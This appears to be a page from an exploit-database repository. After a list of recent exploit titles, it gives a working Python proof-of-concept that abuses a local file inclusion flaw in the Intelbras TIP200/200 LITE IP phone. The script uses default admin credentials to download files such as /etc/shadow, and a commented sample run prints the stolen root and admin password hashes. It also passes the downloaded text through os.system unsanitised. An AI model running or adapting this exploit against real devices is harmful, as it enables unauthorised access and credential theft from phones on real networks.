dd3b710ae8
14 changes to exploits/shellcodes Microsoft Windows Kernel - 'NtQueryVirtualMemory(MemoryMappedFilenameInformation)' 64-bit Pool Memory Disclosure Microsoft Windows Kernel - 'NtQueryInformationThread(ThreadBasicInformation)' 64-bit Stack Memory Disclosure Microsoft Windows Kernel - 'nt!KiDispatchException' 64-bit Stack Memory Disclosure Microsoft Windows Kernel - 'nt!NtWaitForDebugEvent' 64-bit Stack Memory Disclosure Internet Explorer - 'RegExp.lastMatch' Memory Disclosure Kamailio 5.1.1 / 5.1.0 / 5.0.0 - Off-by-One Heap Overflow Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation Microsoft Windows - Desktop Bridge VFS Privilege Escalation Microsoft Windows - Desktop Bridge Virtual Registry Arbitrary File Read/Write Privilege Escalation Microsoft Windows - Desktop Bridge Virtual Registry NtLoadKey Arbitrary File Read/Write Privilege Escalation Intelbras Telefone IP TIP200 LITE - Local File Disclosure Vehicle Sales Management System - Multiple Vulnerabilities Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)
61 lines
No EOL
2.5 KiB
Python
Executable file
61 lines
No EOL
2.5 KiB
Python
Executable file
# Exploit Title: [INTELBRAS TELEFONE IP TIP200/200 LITE Local File Include]
|
|
# Google Dork: []
|
|
# Date: 16/03/2018
|
|
# Exploit Author: [Matheus Goncalves - anhax0r]
|
|
# Vendor Homepage: [https://www.facebook.com/anhaxteam/]
|
|
# Software Link: []
|
|
# Version: [60.0.75.29] (REQUIRED)
|
|
# Tested on: [Debian]
|
|
# CVE : [if applicable]
|
|
|
|
|
|
#Remember that you need login with admin credentials to download files !!! in this case, i used default credentials
|
|
|
|
import requests as http
|
|
import subprocess
|
|
import os
|
|
from requests.auth import HTTPBasicAuth
|
|
def poc():
|
|
print(""" -------------------------------------------------------------------------------------------------------------
|
|
------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include | Local File Download-------------------
|
|
------------- P0c Author: Matheus Goncalves | Pentester at Anhax Security Team -------------------
|
|
-------------------------------------------------------------------------------------------------------------\n""")
|
|
filename = raw_input("filename Ex: /etc/shadow: -> ")
|
|
if(filename == ""):
|
|
filename="/etc/shadow"
|
|
r = http.get("http://192.168.0.207/cgi-bin/cgiServer.exx?page="+str(filename), auth=HTTPBasicAuth('admin', 'admin'))
|
|
print(" ")
|
|
text = r.text
|
|
|
|
print(text)
|
|
savefile = raw_input("Save file? [Y\\n]: ")
|
|
savefile.upper()
|
|
if(savefile=="Y" or savefile=="y"):
|
|
os.system("echo '"+text+"' > "+filename.replace("/etc/", ""))
|
|
print("File saved !!")
|
|
start()
|
|
else:
|
|
start()
|
|
|
|
def start():
|
|
poc()
|
|
|
|
start()
|
|
|
|
|
|
#root@hax:~/itscanner# python p0c.py
|
|
# -------------------------------------------------------------------------------------------------------------
|
|
# ------------- 0day: TELEFONE IP TIP200/200 LITE | Local File Include |-------------------
|
|
# ------------- P0c Author: Matheus Goncalves | Pentester at Anhax Security Team -------------------
|
|
# -------------------------------------------------------------------------------------------------------------
|
|
#filename Ex: /etc/shadow: -> /etc/shadow
|
|
|
|
#root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7:::
|
|
#admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::
|
|
|
|
#Save file? [Y\n]: y
|
|
#File saved !!
|
|
|
|
#root@hax:~/itscanner# cat shadow
|
|
#root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7:::
|
|
#admin:DP7Kg4tE0Y9rs:11876:0:99999:7::: |